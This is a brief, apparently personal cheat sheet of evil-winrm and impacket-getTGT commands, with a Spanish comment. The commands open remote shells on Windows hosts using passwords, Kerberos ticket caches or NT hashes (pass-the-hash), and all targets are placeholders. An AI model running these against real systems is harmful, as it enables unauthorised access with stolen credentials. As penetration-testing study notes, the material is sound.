evil-winrm -i IP -u USER -p "PASS"

evil-winrm -i IP -u 'USER' -k /tmp/krb5cc_1000

A veces se peta si no le indicas el DC y el dominio

evil-winrm -i DC.DOMAIN -r DOMAIN -k TICKET.ccache

evil-winrm -i IP -u USER -p "PASS" -r DOMAIN -i DC.DOMAIN

evil-winrm -i IP -u USER -H 'NTHASH'

Kerberos

impacket-getTGT DOMAIN/'USER':'PASSWORD' -dc-ip DC.DOMAIN 

export KRB5CCNAME=USER.ccache

evil-winrm -i IP -u USER -p "PASSWORD" -r DOMAIN -i DC.DOMAIN -k USER.ccache